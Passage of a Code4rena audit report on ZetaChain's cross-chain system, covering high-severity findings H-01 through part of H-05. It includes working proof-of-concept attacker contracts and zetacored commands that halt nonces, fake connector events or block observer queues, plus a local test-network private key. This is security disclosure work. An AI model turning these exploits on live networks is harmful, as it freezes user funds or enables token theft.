Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the ZetaChain smart contract system written in Solidity. The audit took place between November 20 — December 18, 2023.


32 Wardens contributed reports to the ZetaChain:

  1. berndartmueller
  2. ChristiansWhoHack (Strikeout and ging3r)
  3. oakcobalt
  4. ciphermarco
  5. MevSec (Ethnical and Franfran)
  6. dontonka
  7. p0wd3r
  8. Al-Qa-qa
  9. zhaojie
  10. deliriusz
  11. QiuhaoLi
  12. Josephdara_0xTiwa (josephdara and 0xTiwa)
  13. jayjonah8
  14. kuprum
  15. likeTheWind
  16. csanuragjain
  17. lsaudit
  18. IllIllI
  19. 0x6980
  20. PNS
  21. ChaseTheLight
  22. hihen
  23. SAQ
  24. codeslide
  25. Bauchibred
  26. Kaysoft
  27. Topmark
  28. cartlex_
  29. Sathish9098

This audit was judged by 0xean.

Final report assembled by PaperParachute.


The C4 analysis yielded an aggregated total of 48 unique vulnerabilities. Of these vulnerabilities, 14 received a risk rating in the category of HIGH severity and 34 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 20 reports detailing issues with a risk rating of LOW severity or non-critical.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 ZetaChain repository, and is composed of 31 smart contracts written in the Solidity programming language and includes 1565 lines of Solidity code.

Prior to this competitive audit, 3 teams of Code4rena wardens competed to produce a set of resources to help accelerate wardens’ ability to compete. For more information, see here.

In addition to the known issues identified by the project team, an Automated Findings report was generated using the 4naly3er bot and all findings therein were classified as out of scope.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (14)

[H-01] Broken NonceVoter Allows Observer to Halt the Chain

Submitted by ciphermarco, also found by ChristiansWhoHack and zhaojie

As it is, NonceVoter does not count votes or perform any similar operations. A single observer can use it to change chain nonces. Although there is a comment pointing this function is deprecated, it critically influences the system with its broken implementation. Arbitrarily changing nonces for the connected chains can be used to completely break the functioning of the chain and cause loss of funds.

Proof of Concept

This function is restricted to validator observers (k.zetaObserverKeeper.IsAuthorized(ctx, msg.Creator, chain)):

func (k msgServer) NonceVoter(goCtx context.Context, msg *types.MsgNonceVoter) (*types.MsgNonceVoterResponse, error) {
	ctx := sdk.UnwrapSDKContext(goCtx)
	chain := k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(msg.ChainId)
	if chain == nil {
		return nil, observertypes.ErrSupportedChains

	if ok := k.zetaObserverKeeper.IsAuthorized(ctx, msg.Creator, chain); !ok {
		return nil, observertypes.ErrNotAuthorizedPolicy
	// ... SNIP ...

After this check, the entire voting logic is essentially ignored, with a relevant part only drafted and commented, and the chain nonce is simply set:

	k.SetChainNonces(ctx, chainNonce)
	return &types.MsgNonceVoterResponse{}, nil

This can be easily tested inside one of the hosts in the smoke-tests:

# cd into repos/node
$ make start-smoketest
$ docker exec -it zetacore0 bash
# Inside zetacore0
# The operator key may be acquired with the command `zetacored keys list`
$ zetacored tx crosschain nonce-voter 18444 1337 --from ${operator_key} --fees "300azeta"
# Confirm the prompt with "y"
$ zetacored q crosschain list-chain-nonces
- chain_id: "18444"
  creator: ""
  finalizedHeight: "57"
  index: btc_regtest
  nonce: "1337" # <--- Chain nonce
  - zeta1t4n5yj0u3wjkjwum5exhgh5834gnylgs3apmw5
- chain_id: "1337"
  creator: ""
  finalizedHeight: "57"
  index: goerli_localnet
  nonce: "0"
  signers: []
- chain_id: "101"
  creator: ""
  finalizedHeight: "57"
  index: zeta_mainnet
  nonce: "0"
  signers: []
  next_key: null
  total: "0"

After the above commands, you can also use the command zetacored q crosschain list-chain-nonces inside zetacored1 to check the 1337 nonce has been set.

p.NonceHigh != int64(nonce.Nonce)

One simple way to halt critical operations of the chain and cause funds to be stuck is to make the function UpdateNonce in cctx_utils.go fail. Luckily, there is a check that causes this function to fail and return an error, and all we need to do is to change the chain nonce:

	// #nosec G701 always in range
	if p.NonceHigh != int64(nonce.Nonce) {
		return cosmoserrors.Wrap(types.ErrNonceMismatch, fmt.Sprintf("chain_id %d, high nonce %d, current nonce %d", receiveChainID, p.NonceHigh, nonce.Nonce))

All a faulty or compromised observer needs to do is to use NonceVoter to desynchronise the nonces for each chain, and this error will be consistently returned by UpdateNonce for all chains.

These are critical functions that depend on UpdateNonce:

Essentially, transactions will be halted and the funds stuck.

Tools Used

Code Editor, Docker.

Implement the correct voting logic or remove this message server’s function from the code. In the codebase, it seems there is already another design choice for setting chain nonces that does not depend on this function, so the best mitigation is probably to remove this function altogether.

lumtis (ZetaChain) confirmed

[H-02] Zeta Observer nodes are not listening to internal TXs, which makes Smart Contract Wallets users’ funds locked when making Omnichain calls.

Submitted by Al-Qa-qa, also found by Al-Qa-qa, deliriusz, and likeTheWind


Zetachain allows omnichain TXs (sending funds from external chains to Zeta EVM chain), using different methods.

  • If it’s just sending main blockchain coin funds between addresses: You deposit funds directly to the TSS_ADDRESS and it will send money to the destination address as ZRC-20 tokens on Zeta EVM chain.
  • If you are sending ERC20: You need to use ERC20Custody::deposit().

The problem occurs in the first sending method. When the user sends funds (native chain coins) to the TSS_ADDRESS.

To define the receiver address you have two things to do:

  • Provide it in the data field of the TX in bytes format (+ any additional message if needed), and Observer nodes take out the rest of the job to decode.
  • Not providing data field in the TX, and in that case, Observers use the caller itself as the receiver address on the Zeta blockchain.

The problem affects Omnichain (Inbound TXs, external EVM => Zeta EVM) which is made by smart contract wallet users.

When smart contract wallets make a sending request, it doesn’t make an RPC call. They are making low-level call to transfer funds. And here is where the problem occurs.

Observers will not notice this transaction, funds will be sent to the TSS_ADDRESS and the Observers will not know that there is an Omnichain call has happened. So user funds will be locked in the TSS_ADDRESS.

Why Smart Contract Wallets are important:

We should keep in mind that Smart Contract wallets are heavily adopted, and the problem does not affect a small group of users. Mult-sig wallets are increasing, and Account Abstraction is coming, Users will deal with Smart Contract Wallets in the near future instead of EOA.

This is dangerous for users, as most of the users are using their wallets using a UI, and some popular wallets like MetaMask will support account abstraction soon, which will make users’ wallets a Smart Contract Wallet as we illustrated before. So users will not be able to interact with ZetaChain and will lose their funds without knowing what is going wrong.

Proof of Concept

In our auditing process of the protocol, we made a lot of things (installing deps, making contracts, writing deployments and interact scripts, etc…), So It will be hard for the judger to set up the development environment.

We worked on the second part protocol-contract, and used zeta_testnet for our testing purposes.

Here is the Dropbox link to download the protocol-contract we worked on, you will find setup.md to help you install deps, and run POC scripts easily without any problems.

Downloading link here.

To not make the POC page too long, we will mention the main points we made to prove the problem. And In the Dropbox folder, everything including (testing script, contracts, etc…) exists with comments and a lot of logs to be easily understood.

After installing the protocol-contracts from the Dropbox, you can simply write this command in the console:

yarn run audit-H1:internal-to-address

What this script does, is what we are going to illustrate below. At first, we made a simple contract that represented a smart contract wallet, sending and receiving coins.

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.7;

/// @title Smart Contract Waller
/// @author Code4rena Warden
/// @notice This is not a complete wallet, it is just for demonistrating the vulnerability
contract InternalWallet {
    // to be able to receive ETH
    receive() external payable {}

    // Sending funds to `TSS_ADDRESS` to receive it on zetachain account
    // NOTE: this function should fail, and the funds will be locked in the `TSS_ADDRESS` when sending
    function transferOmnichain(uint256 amount, address tssAddress, bytes memory to) public payable returns (bool) {
        require(amount <= address(this).balance, "InternalWallet: not enough suffiecent");
        (bool success, ) = tssAddress.call{value: amount}(to);
        require(success, "InternalWallet: failed to make Omnichain call");
        return true;

    // Withdraw funds after completeing testing
    function withdraw(address to) public returns (bool) {
        (bool success, ) = to.call{value: address(this).balance}("");
        require(success, "InternalWallet: failed to withdraw funds");
        return true;

Lastly, we fired transferOmnichain with the following parameters:

  • amount: 0.1 tMATIC.
  • tssAddress: TSSADDRESS on mumbaitestnet (0x8531a5aB847ff5B22D855633C25ED1DA3255247e).
  • to: Our EOA on ZetaChain (0x0a485F234D49F28b688495d071D164E7dB0cBd9A).

Image Link

ZetaClient Observers should listen to the transaction, then send ZRC-20 tMATIC to the to address. But this did not occur.

This problem happened because ZetaClient Observers handles sending to TSS_ADDRESS if it is the to parameter of the PRC call, and if the RPC calls contain an internal transactions array, it did not check them.

func (ob *EVMChainClient) observeInTX() error {
    //task 1:  Query evm chain for zeta sent logs
    func() { ... }()
    // task 2: Query evm chain for deposited logs
    func() { ... }()
    // task 3: query the incoming tx to TSS address ==============
    func() {
        tssAddress := ob.Tss.EVMAddress() // after keygen, ob.Tss.pubkey will be updated
        if tssAddress == (ethcommon.Address{}) {
            ob.logger.ExternalChainWatcher.Warn().Msgf("observeInTx: TSS address not set")
        // query incoming gas asset
        for bn := startBlock; bn <= toBlock; bn++ {
            for _, tx := range block.Transactions() {
                // Checking for tx.to only not including internal transactions for each transaction
                if *tx.To() == tssAddress { ... }

Since smart contract wallets can’t trigger the transfer directly, all sending from Smart Contract wallets (Multi-sig, Account Abstraction, …) will fail.

(EOA => Smart Contract Wallet address => TSSADDRESS). The to will be the contract wallet address, not the `TSSADDRESS`.

And since the Observers didn’t even listen to the TX (the transaction sent by the smart contract wallet), they will not revert, they will simply do nothing. like there is no one sending money. This will lead to the loss of all funds sent to the TSS_ADDRESS from Smart Contract Wallets in external chains when making Omnichain InBound TXs calls.

Here is one of the TXs we made:

We can see that the transaction to parameter is the Smart Contract Wallet, So the Observers did not catch this TX.

Image Link

Tools Used

Hardhat, Polygon Mumbai explorer, and ZetaChain explorer

We should track the internal TXs for each RPC transaction. and if the to of one of the internal TXs equals the TSS_ADDRESS Observers should handle this transaction too (Observers handle it as an InBound Omnichain call).

Although the solution may be simple two things will be challenging when implementing this:

  1. How can we decode data if it is an internal Tx?
  2. Listening to each TX internal TXs may slow down monitoring TXs as the observer nodes will be performing a lot of computation.

How can we decode data if it is an internal Tx?

In normal TXs to the TSS_ADDRESS you are providing the address in the first 20 bytes of the message, and if you want to make external logic on the ZetaChain you are providing them after the address in bytes.

Output message: (20 bytes: receiver address in ZetaChain)(bytes: the message that will be pathed to conCrossChainCall).

But In the case of internal TXs things differ, as the function call we fired on our smart contract wallet + message passed in the low-level call to the TSS_ADDRESS both exists in the output message.

Here is the output message of the TX I made in testing: Image Link

We can write cast pretty-calldata <OUTPUT_MESSAGE> to decode the message, and know what it contained.

 Method: 4696616c // transferOmnichain(uint256,address,bytes)
 [000]: 000000000000000000000000000000000000000000000000016345785d8a0000 // amount sent 
 [020]: 0000000000000000000000008531a5ab847ff5b22d855633c25ed1da3255247e // tssAddress
 [040]: 0000000000000000000000000000000000000000000000000000000000000060 // The location of the bytes array
 [060]: 0000000000000000000000000000000000000000000000000000000000000014 // bytes array length hex(14) = 20 bytes
 [080]: 0a485f234d49f28b688495d071d164e7db0cbd9a000000000000000000000000 // The bytes array data (receiver address on ZetaChain)

If we go and see how Geth is logging for this transaction, we will find it has an array of calls that has one call that represents the internal transaction information.


Image Link

So it will be easy for Observer nodes to extract the data sent to the TSS_ADDRESS regarding the data that represents overall transaction output data.

Listening to each TX internal TXs may slow down monitoring TXs as the observer nodes will be performing a lot of computation.

Listening to all transactions, checking for internal transactions for every transaction, and scanning them may cause a lack of network speed (Observers nodes). We are aware of this problem, but we don’t exactly know how much performance and speed we will lose when implementing listening to the internal TXs.

The protocol devs are the only one who can determine how much speed the network lose when implementing the internal TXs listening, but In the case of a significant loss in speed, I will mention some things that will help solve the problem if these problems arise after implementing the Mitigation.

  1. The type of the transaction is CALL, when we do it directly (RPC), or indirectly (Smart Contract Call). We can only pick the internal TXs that go to the to address of type CALL.
  2. We can separate the Observers’ jobs, instead of Querying the three types of In TXs that should be tracked by each Observe, each Observer node is responsible for tracking one of the following EVM state changes:

    1. Query evm chain for zeta sent logs
    2. Query evm chain for deposited logs
    3. Query the incoming tx to TSS address

So we are separating the work into three, but this may be very hard to implement especially for the emission module, how can it distribute rewards?

The last solution may be useless, and unable to be implemented in real. However, I preferred to mention everything that can help in solving the problem of lack of network speed when implementing listening to the internal TXs.

lumtis (ZetaChain) confirmed

[H-03] Fake ZetaReceived events cause the outbound cctx to remain pending resulting in a blocked outbound EVM transaction queue

Submitted by berndartmueller (1, 2) also found by MevSec, and ChristiansWhoHack (1, 2, 3, 4)

Events such as ZetaReceived or ZetaReverted, supposed to be emitted by the connector contract, can be faked by the receiver contract that is called as part of the onReceive or onRevert call.

Worst case, a cctx can be purposefully caused to remain stuck in the PendingOutbound state, which blocks the outbound EVM transaction queue and prevents further outbound transactions from being sent.

Proof of Concept

The observer’s EVM client confirms sent outbound transaction within the IsSendOutTxProcessed function and sends the confirmation (i.e., MsgVoteOnObservedOutboundTx vote message) to ZetaChain to ultimately finalize and settle the cctx.

Specifically, outbound cctx’s of type CoinType_Zeta are processed by checking the emitted events (logs) of the containing transaction. It is expected that either the ZetaReceived or ZetaReverted event is emitted by the connector contract.

However, in line 386 (and following), the event’s legitimacy is not verified by checking the emitter contract address.

386: 	receivedLog, err := connector.ZetaConnectorNonEthFilterer.ParseZetaReceived(*vLog)

Internally, the ParseZetaReceived function only parses the event and makes sure the event’s signature matches the expected one.

func (_ZetaConnectorNonEth *ZetaConnectorNonEthFilterer) ParseZetaReceived(log types.Log) (*ZetaConnectorNonEthZetaReceived, error) {
	event := new(ZetaConnectorNonEthZetaReceived)
	if err := _ZetaConnectorNonEth.contract.UnpackLog(event, "ZetaReceived", log); err != nil {
		return nil, err
	event.Raw = log
	return event, nil

Thereafter, once the first matching ZetaReceived event is found and parsed, the confirmation is sent to ZetaChain, and the for loop is exited early via the return statement in line 421. As a result, the other legitimate ZetaReverted event, emitted by the connector contract, is ignored.

This fake ZetaReceived event can be very harmful to the system if it causes the cctx to not be finalized and stuck in the PendingOutbound state.

Concretely, this can be achieved by using the wrong internalSendHash value in the ZetaReceived event, which is used to uniquely identify the cctx. If the internalSendHash value does not match the cctx’s index and instead, refers to a non-existent cctx, the MsgVoteOnObservedOutboundTx message fails and will never be finalized.

Such a cctx remains in the pending queue and will be repeatedly picked up by observers in the startSendScheduler function.

Finally, the impact of this vulnerability shows itself by blocking the outbound transactions due to the MaxLookaheadNonce check in zetacore_observer.go#L181-L185:

181: const MaxLookaheadNonce = 120
182: if params.OutboundTxTssNonce > cctxList[0].GetCurrentOutTxParam().OutboundTxTssNonce+MaxLookaheadNonce {
183: 	co.logger.ZetaChainWatcher.Error().Msgf("nonce too high: signing %d, earliest pending %d", params.OutboundTxTssNonce, cctxList[0].GetCurrentOutTxParam().OutboundTxTssNonce)
184: 	break
185: }

At one point, the stuck cctx will be the first item in the cctxList (i.e., cctxList[0]), while the next item, at position 1, will have a nonce that is greater than the stuck cctx’s nonce plus the MaxLookaheadNonce value.

Basically, this lookahead nonce check acts as a throttle to limit the amount of sent outbound transactions per heartbeat (i.e., per ZetaChain block).

Subsequently, the break statement in line 184 early exits the for loop, skipping all other cctx’s in the cctxList and preventing them from being sent to the external chain.


The following simple proof of concept demonstrates sending a cross-chain message and faking the ZetaReceived event to cause the cctx to remain pending.

  1. Spin up the smoke tests for a local test environment via make start-smoketest.
  2. Setup Remix (or similar), Metamask (or similar) with the local ETH network and the deployer account (which has already sufficient Zeta tokens)

    • Private key: d87baf7bf6dc560a252596678c12e41f7d1682837f05b29d411bc3f78ae2c263
    • Address: 0xE5C5367B8224807Ac2207d350E60e1b6F27a7ecC
  3. Deploy the following Attacker Solidity contract to the local ETH network:
// SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.8.0;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

interface ZetaInterfaces {
    * @dev Use SendInput to interact with the Connector: connector.send(SendInput)
    struct SendInput {
        /// @dev Chain id of the destination chain. More about chain ids https://docs.zetachain.com/learn/glossary#chain-id
        uint256 destinationChainId;
        /// @dev Address receiving the message on the destination chain (expressed in bytes since it can be non-EVM)
        bytes destinationAddress;
        /// @dev Gas limit for the destination chain's transaction
        uint256 destinationGasLimit;
        /// @dev An encoded, arbitrary message to be parsed by the destination contract
        bytes message;
        /// @dev ZETA to be sent cross-chain + ZetaChain gas fees + destination chain gas fees (expressed in ZETA)
        uint256 zetaValueAndGas;
        /// @dev Optional parameters for the ZetaChain protocol
        bytes zetaParams;

    * @dev Our Connector calls onZetaMessage with this struct as argument
    struct ZetaMessage {
        bytes zetaTxSenderAddress;
        uint256 sourceChainId;
        address destinationAddress;
        /// @dev Remaining ZETA from zetaValueAndGas after subtracting ZetaChain gas fees and destination gas fees
        uint256 zetaValue;
        bytes message;

    * @dev Our Connector calls onZetaRevert with this struct as argument
    struct ZetaRevert {
        address zetaTxSenderAddress;
        uint256 sourceChainId;
        bytes destinationAddress;
        uint256 destinationChainId;
        /// @dev Equals to: zetaValueAndGas - ZetaChain gas fees - destination chain gas fees - source chain revert tx gas fees
        uint256 remainingZetaValue;
        bytes message;

interface ZetaConnector {
    function send(ZetaInterfaces.SendInput calldata input) external;

interface ZetaReceiver {
    function onZetaMessage(ZetaInterfaces.ZetaMessage calldata zetaMessage) external;
    function onZetaRevert(ZetaInterfaces.ZetaRevert calldata zetaRevert) external;

contract Attacker is ZetaReceiver {
    event ZetaReceived(
        bytes zetaTxSenderAddress,
        uint256 indexed sourceChainId,
        address indexed destinationAddress,
        uint256 zetaValue,
        bytes message,
        bytes32 indexed internalSendHash

    ZetaConnector public connector = ZetaConnector(0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9);
    IERC20 public zeta = IERC20(0xA8D5060feb6B456e886F023709A2795373691E63);

    function start(uint256 amount, uint256 gasLimit) public {
        ZetaInterfaces.SendInput memory input = ZetaInterfaces.SendInput(

        zeta.transferFrom(msg.sender, address(this), amount);
        zeta.approve(address(connector), amount);


    function onZetaMessage(ZetaInterfaces.ZetaMessage calldata zetaMessage) external {
        bytes memory zetaTxSenderAddress = zetaMessage.zetaTxSenderAddress;
        uint256 sourceChainId = zetaMessage.sourceChainId;
        address destinationAddress = zetaMessage.destinationAddress;
        uint256 zetaValue = zetaMessage.zetaValue + 1;
        bytes memory message = zetaMessage.message;
        bytes32 internalSendHash = bytes32(abi.encodePacked("42")); // @audit-info Non-existent cctx index

        emit ZetaReceived(zetaTxSenderAddress, sourceChainId, destinationAddress, zetaValue, message, internalSendHash);

    function onZetaRevert(ZetaInterfaces.ZetaRevert calldata zetaRevert) external {}
  1. Approve the Attacker contract as the Zeta token spender for the deployer (0xE5C5367B8224807Ac2207d350E60e1b6F27a7ecC) address. Unlimited allowance is recommended for simplicity.
  2. With the deployer account, call the start function on the Attacker contract with the following parameters:

    • amount: 3133700000000000000 (i.e., 3.1337e18)
    • gasLimit: 200000

    This function initiates a cross-chain message, however, for simplicity the cross-chain message is sent to the same chain as it originates, i.e., the local ETH network with the chain id 1337. The Attacker contract is the receiver and will emit a fake ZetaReceived event (imitating the ZetaConnectorEth.onReceive function’s event). However, this fake ZetaReceived event has the wrong internalSendHash value, which is used to identify the cross-chain cctx. As a result, voting for the outbound cctx will fail and the cctx remains pending.

  3. The current cctx’s status can be queried by accessing the zetacore0 docker container and using the list-cctx command:

    docker exec -it zetacore0 sh
    zetacored q crosschain list-cctx

    Checking the output shows that the status of the cctx remains pending (PendingOutbound), even though it has been successfully sent to the receiver chain:

    - cctx_status:
        lastUpdate_timestamp: "1702830340"
        status: PendingOutbound
        status_message: ""
      creator: zeta17q8u7exkgcacjvv934vrmdc79fgfxk2p8z577u
        amount: "3133700000000000000"
        asset: ""
        coin_type: Zeta
        inbound_tx_ballot_index: 0xcff6c96cd6701b770ce653189c4e769a3d9d891780a2e135ef641b386174a1bd
        inbound_tx_finalized_zeta_height: "2270"
        inbound_tx_observed_external_height: "2678"
        inbound_tx_observed_hash: 0x1195c0861c9fc05464ccf5630ded9b03a28bccc28e8b341a351fc1469c482fba
        sender: 0xa825eAa55b497AF892faca73a3797046C10B7c23
        sender_chain_id: "1337"
        tx_origin: 0xE5C5367B8224807Ac2207d350E60e1b6F27a7ecC
      index: 0xcff6c96cd6701b770ce653189c4e769a3d9d891780a2e135ef641b386174a1bd

Subsequently, the observers will repeatedly try to vote on it, but keep failing. In the end, this stuck cctx blocks the outbound transaction queue due to the maximum lookahead nonce check. As a result, no further outbound transactions are sent.

Consider carefully checking the emitter address of critical events, such as the ZetaReceived in evm_client.go#L386, the ZetaReverted event in evm_client.go#L423, and the Withdrawn event in evm_client.go#L490.

lumtis (ZetaChain) confirmed

[H-04] A malicious inbound transaction can prevent subsequent events from being processed by observers

Submitted by berndartmueller (1, 2), also found by QiuhaoLi



An attacker can send an inbound ERC-20 deposit or Zeta transaction with a message exceeding the maximum length limit and causing all other subsequent inbound transactions that occur in the same block range (i.e., startBlock to toBlock) to be ignored by the observers.

Proof of Concept

Please note: The outlined issue in this submission is different than the medium severity issue reported in “EVM RPC errors may lead to missed inbound transactions” as it can be actively exploited.

ZetaChain observers watch external EVM chains via the ExternalChainWatcher function that internally calls the observeInTX function on each ob.GetCoreParams().InTxTicker ticker.

The observeInTX function performs multiple tasks:

  1. Query for zeta sent (ZetaSent) logs
  2. Query for ERC-20 deposited logs
  3. Query tx’s that are sent to the TSS address

The queried blocks are bound by the range of startBlock and toBlock, which are set in lines 809-810. The startBlock is the previously processed toBlock (i.e., retrieved via ob.GetLastBlockHeightScanned()), incremented by 1.

At the end of the function, in line 988, the toBlock is set as the new lastBlockHeightScanned.

However, if calling PostSend in lines 856 and 898 errors, the for loop is exited early via the subsequent return statement.

Consequently, the observeInTX function proceeds to store the toBlock as the new lastBlockHeightScanned, even though the blocks (and their logs) have not been fully processed.

An attacker can exploit this issue with an inbound transaction that has a message exceeding the maximum length of MaxMessageLength = 10240. This upper bound on the message length is enforced in the MsgVoteOnObservedInboundTx message’s ValidateBasic function and prevents observers from sending such a message to ZetaChain as well as also preventing any further processing of the message in case it reaches ZetaChain.

Specifically, both the ERC20Custody.deposit and the ZetaConnectorEth.send function allow specifying an arbitrary message.


  1. Spin up the smoke tests for a local test environment via make start-smoketest
  2. Setup Remix (or similar), Metamask (or similar) with the local ETH network and the deployer account (which has already sufficient Zeta tokens)

    • Private key: d87baf7bf6dc560a252596678c12e41f7d1682837f05b29d411bc3f78ae2c263
    • Address: 0xE5C5367B8224807Ac2207d350E60e1b6F27a7ecC
  3. Deploy the following SimulateAttack Solidity contract to the local ETH network:
// SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.8.0;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

interface ZetaInterfaces {
    * @dev Use SendInput to interact with the Connector: connector.send(SendInput)
    struct SendInput {
        /// @dev Chain id of the destination chain. More about chain ids https://docs.zetachain.com/learn/glossary#chain-id
        uint256 destinationChainId;
        /// @dev Address receiving the message on the destination chain (expressed in bytes since it can be non-EVM)
        bytes destinationAddress;
        /// @dev Gas limit for the destination chain's transaction
        uint256 destinationGasLimit;
        /// @dev An encoded, arbitrary message to be parsed by the destination contract
        bytes message;
        /// @dev ZETA to be sent cross-chain + ZetaChain gas fees + destination chain gas fees (expressed in ZETA)
        uint256 zetaValueAndGas;
        /// @dev Optional parameters for the ZetaChain protocol
        bytes zetaParams;

interface ZetaConnector {
    function send(ZetaInterfaces.SendInput calldata input) external;

contract SimulateAttack {
    ZetaConnector public connector = ZetaConnector(0x733aB8b06DDDEf27Eaa72294B0d7c9cEF7f12db9);
    ERC20 public zeta = ERC20(0xA8D5060feb6B456e886F023709A2795373691E63);

    function simulateAttack(uint256 amount, uint256 gasLimit, uint256 length) external {
        sendMaliciousMessage(amount, gasLimit, length);

        // Pretend this message was sent by someone else in a subsequent transaction/block
        sendLegitimateMessage(1.337e18, 100_000);

    function sendMaliciousMessage(uint256 amount, uint256 gasLimit, uint256 length) public {
        // Create a bytes message with a non-zero character length of length
        bytes memory message = new bytes(length);
        // fill with non-zero data
        for (uint256 i = 0; i < length; i++) {
            message[i] = bytes1(uint8(1));

        ZetaInterfaces.SendInput memory input = ZetaInterfaces.SendInput(

        zeta.transferFrom(msg.sender, address(this), amount);
        zeta.approve(address(connector), amount);


    // Pretend this message was sent by someone else in a subsequent transaction/block
    function sendLegitimateMessage(uint256 amount, uint256 gasLimit) public {
        ZetaInterfaces.SendInput memory input = ZetaInterfaces.SendInput(

        zeta.transferFrom(msg.sender, address(this), amount);
        zeta.approve(address(connector), amount);

  1. Approve the SimulateAttack contract as the Zeta token spender for the deployer (0xE5C5367B8224807Ac2207d350E60e1b6F27a7ecC) address. An unlimited allowance is recommended for simplicity.
  2. With the deployer account, call the simulateAttack function with the following parameters:

    • amount: 3000000000000000000 (i.e., 3e18)
    • gasLimit: 100000
    • length: 10240 (slightly less would also work due to the observer’s internal base64 encoding)

    This function sends two messages (i.e., ZetaSent events): An attacker’s message with a very long message, and a second legitimate message, pretending to be sent by someone else (in a different tx/block).

  3. Watch the observer (zetacore) logs via docker logs zetaclient0 -f --tail 100
  4. Notice the ERR error posting to zeta core error once the first event is picked up:

    2023-12-16T22:08:12Z INF Checking for all inTX : startBlock 411, toBlock 411 chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:14Z INF Checking for all inTX : startBlock 412, toBlock 412 chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:16Z INF Checking for all inTX : startBlock 413, toBlock 413 chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:16Z INF TxBlockNumber 413 Transaction Hash: 0x335c2abe18cd64b10f8d60dd554c2c54ec1f8225b54ee84895a8ab795688c339 Message :  chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:16Z ERR error posting to zeta core error="/zetachain.zetacore.crosschain.MsgVoteOnObservedInboundTx invalid msg | message is too long: 13656: invalid request" chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:18Z INF Checking for all inTX : startBlock 414, toBlock 414 chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:20Z INF Checking for all inTX : startBlock 415, toBlock 415 chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:22Z INF Checking for all inTX : startBlock 416, toBlock 416 chain=goerli_localnet module=ExternalChainWatcher
    2023-12-16T22:08:24Z INF Checking for all inTX : startBlock 417, toBlock 417 chain=goerli_localnet module=ExternalChainWatcher

    Thereafter, the second ZetaSent event is ignored.

Consider only skipping the “invalid” event and continue processing the remaining events to ensure all events are processed and voted upon.

lumtis (ZetaChain) confirmed

[H-05] Disabling outbound transactions is ineffective and allows for Zeta token theft

Submitted by berndartmueller, also found by ChristiansWhoHack and dontonka

Outbound EVM transactions can not be disabled and will be wrongly sent out, either stealing Zeta tokens or manifesting in a loss for users who attempt to withdraw gas or ERC-20 tokens.

Proof of Concept

In lines 530-544 of the TryProcessOutTx function, called by the observer’s EVM signer to send an outbound cctx transaction to the receiver chain, the SignOutboundTx function is invoked to sign the transaction tx.

This transaction has the Zeta connector contract as the to address and the ABI encoded onReceive function call as the calldata. As a result, the connector contract, e.g., the ZetaConnectorEth contract, has the onReceive function called and subsequently transfers Zeta tokens to the destinationAddress.

Now let’s re-visit a critical part of the TryProcessOutTx function, specifically, lines 439-544:

439: 	if send.GetCurrentOutTxParam().CoinType == common.CoinType_Cmd { // admin command
... 		// [...]
452: 	} else if send.InboundTxParams.SenderChainId == common.ZetaChain().ChainId && send.CctxStatus.Status == types.CctxStatus_PendingOutbound && flags.IsOutboundEnabled {
453: 		if send.GetCurrentOutTxParam().CoinType == common.CoinType_Gas {
... 			  // [...]
462: 		}
463: 		if send.GetCurrentOutTxParam().CoinType == common.CoinType_ERC20 {
... 			  // [...]
475: 		}
476: 		if send.GetCurrentOutTxParam().CoinType == common.CoinType_Zeta {
... 			  // [...]
490: 		}
491: 	} else if send.CctxStatus.Status == types.CctxStatus_PendingRevert && send.OutboundTxParams[0].ReceiverChainId == common.ZetaChain().ChainId {
... 		// [...]
515: 	} else if send.CctxStatus.Status == types.CctxStatus_PendingRevert {
... 		// [...]
530: 	} else if send.CctxStatus.Status == types.CctxStatus_PendingOutbound {
... 		// [...]
532: 		tx, err = signer.SignOutboundTx(
533: 			ethcommon.HexToAddress(send.InboundTxParams.Sender),
534: 			big.NewInt(send.InboundTxParams.SenderChainId),
535: 			to,
536: 			send.GetCurrentOutTxParam().Amount.BigInt(),
537: 			gasLimit,
538: 			message,
539: 			sendhash,
540: 			send.GetCurrentOutTxParam().OutboundTxTssNonce,
541: 			gasprice,
542: 			height,
543: 		)
544: 	}

Here, the type of transaction signature is determined, based on the coin type, the originator (SenderChainId), and the status of the cctx.

The possible states are as follows (the order is important):

  1. Line 439: Admin command
  2. Line 452: Pending outbound cctx, originating from ZetaChain. Additionally, in lines 453, 463, and 476, the coin type is checked to determine the specific type of transaction.
  3. Line 491: Revert a failed cctx that was originally sent to ZetaChain
  4. Line 515: Revert a failed cctx that was originally sent to an external chain
  5. Line 530: Pending outbound cctx. No matter the coin type, it will always result in a Zeta token transfer

In the second state, in line 452, it is also checked if outbound transactions are generally enabled (flags.IsOutboundEnabled) and if they are disabled, this else if block is skipped while the if in line 530 evaluates to true.

However, this is problematic in two ways:

  1. Even though outbound transactions are disabled, cctxs are still sent out.
  2. No matter the coin type of the pending outbound cctx, it will be signed via SignOutboundTx and resulting in a Zeta token transfer

For the second case, consider a pending outbound cctx with the coin type common.CoinType_ERC20 where the ERC-20 asset is worth less than the Zeta token (please note that ERC-20 tokens are restricted by a whitelist).

